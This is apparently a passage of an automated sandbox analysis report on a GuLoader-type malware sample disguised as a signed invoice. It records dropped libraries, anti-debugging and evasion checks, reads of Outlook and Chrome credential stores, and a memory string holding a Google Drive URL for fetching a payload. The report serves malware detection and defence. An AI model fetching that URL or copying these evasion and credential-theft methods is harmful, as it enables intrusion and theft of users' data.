Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\aD1rF3aM8r\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9CE4 rdtsc 0_2_022F9CE4
Is looking for software installed on the system
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000002.541240943.0000000002310000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000002.541240943.0000000002310000.00000004.00000001.sdmp, usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9CE4 rdtsc 0_2_022F9CE4
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA848 mov eax, dword ptr fs:[00000030h] 0_2_022FA848
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0E1E mov eax, dword ptr fs:[00000030h] 0_2_022F0E1E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6AA7 mov eax, dword ptr fs:[00000030h] 0_2_022F6AA7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4748 mov eax, dword ptr fs:[00000030h] 0_2_022F4748
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9781 mov eax, dword ptr fs:[00000030h] 0_2_022F9781
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4794 mov eax, dword ptr fs:[00000030h] 0_2_022F4794
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4390 mov eax, dword ptr fs:[00000030h] 0_2_022F4390
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9069 mov eax, dword ptr fs:[00000030h] 0_2_022F9069
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA84A mov eax, dword ptr fs:[00000030h] 0_2_022FA84A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3997 mov eax, dword ptr fs:[00000030h] 0_2_022F3997
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7E91 NtWriteVirtualMemory,LdrInitializeThunk, 0_2_022F7E91
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6EA4E1FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_6EA4E1FC

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E96568F sqlite3_bind_value,sqlite3_bind_null,_mbstowcs_s,sqlite3_bind_double,sqlite3_bind_int64, 24_2_6E96568F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97BEDB memset,sqlite3_malloc,memset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_reset, 24_2_6E97BEDB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97C7DE sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 24_2_6E97C7DE
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97BFCD sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,memcpy,sqlite3_reset, 24_2_6E97BFCD
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E99D716 sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset, 24_2_6E99D716
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97EF06 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,sqlite3_step,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_bind_int,sqlite3_column_int,sqlite3_bind_int,sqlite3_column_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset, 24_2_6E97EF06
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E981F5A sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,memset,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free, 24_2_6E981F5A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E977F47 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset, 24_2_6E977F47
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E978F41 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset, 24_2_6E978F41
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E99AF7F sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64, 24_2_6E99AF7F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9804E6 sqlite3_bind_int64,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset, 24_2_6E9804E6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97D40A sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_free,sqlite3_step,sqlite3_reset, 24_2_6E97D40A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E99CDFE sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset, 24_2_6E99CDFE
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E978DE4 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 24_2_6E978DE4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E978D1C sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 24_2_6E978D1C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E98057B sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 24_2_6E98057B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9822B7 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 24_2_6E9822B7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9812CE sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_parameter_count,sqlite3_bind_value, 24_2_6E9812CE
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97D2F1 sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 24_2_6E97D2F1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965A0C sqlite3_bind_parameter_index, 24_2_6E965A0C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965A28 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave, 24_2_6E965A28
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E96525E sqlite3_bind_int,sqlite3_bind_int64, 24_2_6E96525E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965277 sqlite3_bind_int64,sqlite3_mutex_leave, 24_2_6E965277
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9653F8 sqlite3_bind_text16, 24_2_6E9653F8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E966306 sqlite3_value_text,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value, 24_2_6E966306
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965302 sqlite3_bind_null,sqlite3_mutex_leave, 24_2_6E965302
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E98230D sqlite3_bind_null,sqlite3_step,sqlite3_reset, 24_2_6E98230D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965353 sqlite3_bind_text, 24_2_6E965353
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97C0C3 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 24_2_6E97C0C3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965054 sqlite3_bind_blob, 24_2_6E965054
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E96599C sqlite3_bind_parameter_name, 24_2_6E96599C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9651EC sqlite3_bind_double,sqlite3_mutex_leave, 24_2_6E9651EC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9821E4 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_free,sqlite3_step,sqlite3_reset, 24_2_6E9821E4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E978947 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code, 24_2_6E978947
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E96597F sqlite3_bind_parameter_count, 24_2_6E96597F
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
